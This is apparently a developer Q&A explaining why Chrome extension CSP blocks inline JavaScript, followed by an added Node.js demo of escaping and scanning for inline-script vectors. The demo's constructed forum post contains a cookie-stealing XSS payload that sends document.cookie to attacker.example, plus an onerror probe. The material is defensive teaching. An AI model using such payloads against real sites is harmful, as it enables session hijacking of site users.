I’m reading the Chrome extension document “Content Security Policy (CSP)”. It says:
Inline JavaScript, as well as dangerous string-to-JavaScript methods
like eval, will not be executed. This restriction bans both inline
blocks and inline event handlers (e.g. <button onclick="...">).
There is no mechanism for relaxing the restriction against executing
inline JavaScript. In particular, setting a script policy that
includes unsafe-inline will have no effect. This is intentional.
Why are inline <script> blocks unsafe? Can anyone explain it? It would be better if you could give examples.
Thank you.
As the page says:
Basically any script you load needs to be in a separate file accessible locally to the extension. This prevents you from loading 3rd party scripts that get injected into your page or including them like:
An example of this is if you have a form a user can fill out. The user can enter a script tag with some JS in it. Let’s say it’s like a discussion forum. I go in and make a topic but it has some hidden JS in it. Let’s also assume you don’t clean that out before posting it. Now my post has JS that will execute every time somebody views it. This prevents that script from being executed.
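The forum scenario from the answer above, as an added example that is not part of the original question or answer and is not Chrome's own code. It runs under Node.js and uses constructed data throughout: a post body with hidden JavaScript is rendered into page HTML two ways, and a small regex scanner (assumed here, not how the browser really decides) lists the inline-script vectors that an extension's `script-src 'self'` policy refuses to run. The point it makes is the one behind the question: once injected, the attacker's inline script and the developer's own inline `onclick` look the same to the browser, so CSP blocks both and only trusts script files shipped with the extension.

```javascript
// Added example, not from the original page or from Chrome. All posts, HTML
// and helper names here are constructed for illustration.

// A constructed forum post: the attacker's "topic" carries hidden JavaScript.
const attackerPost = {
  author: "mallory",
  body: 'Great thread! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>' +
        '<img src=x onerror="alert(1)">',
};

// Unsafe rendering: the body is concatenated straight into the page's HTML, so
// the attacker's <script> block and onerror handler become inline script that
// the browser cannot tell apart from inline script the developer wrote.
function renderPostUnsafe(post) {
  return `<article><b>${post.author}</b><p>${post.body}</p></article>`;
}

// Safe rendering: escape the HTML metacharacters so user text stays text.
// This is the "clean that out before posting it" step from the answer.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[ch]));
}

function renderPostSafe(post) {
  return `<article><b>${escapeHtml(post.author)}</b><p>${escapeHtml(post.body)}</p></article>`;
}

// Crude scanner (an assumption for this demo, not the browser's real logic)
// for the three inline-script vectors an extension CSP blocks: <script> blocks
// without src, on* handler attributes, and javascript: URLs. It only inspects
// text inside start tags, so escaped user content is never misread as markup.
function findInlineScriptVectors(html) {
  const vectors = [];
  const tagRe = /<([a-z][a-z0-9-]*)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [, name, attrs] = m;
    if (name.toLowerCase() === "script" && !/\bsrc\s*=/i.test(attrs)) {
      vectors.push("inline <script> block");
    }
    const handlerRe = /\b(on[a-z]+)\s*=/gi;
    let h;
    while ((h = handlerRe.exec(attrs)) !== null) {
      vectors.push(`inline handler ${h[1].toLowerCase()}`);
    }
    if (/\b(?:href|src)\s*=\s*["']?\s*javascript:/i.test(attrs)) {
      vectors.push("javascript: URL");
    }
  }
  return vectors;
}

// The developer's own, perfectly well-meant inline handler. CSP flags it for
// the same reason it flags the attacker's: the browser has no way to know who
// wrote an inline handler, so the rule has to be "none at all".
const developerInlinePage = '<button onclick="submitPost()">Post</button>';

// What an extension page is expected to do instead: the only script is the
// extension's own file (allowed by script-src 'self'), and forum.js attaches
// the click handler with addEventListener rather than an onclick attribute.
const cspCompliantPage =
  '<button id="post">Post</button><script src="forum.js"></script>';

// Stand-alone demonstration when run directly with `node`.
if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe render  :", findInlineScriptVectors(renderPostUnsafe(attackerPost)));
  console.log("escaped render :", findInlineScriptVectors(renderPostSafe(attackerPost)));
  console.log("developer page :", findInlineScriptVectors(developerInlinePage));
  console.log("compliant page :", findInlineScriptVectors(cspCompliantPage));
}
```

Running it shows the unsafe render carrying an inline `<script>` block and an `onerror` handler, the escaped render carrying none, the developer's `onclick` page flagged exactly like the attacker's, and the compliant page (one `<script src>` pointing at the extension's own file) passing clean. Escaping is still required; CSP is the backstop for the case the answer describes, where the cleaning step was forgotten.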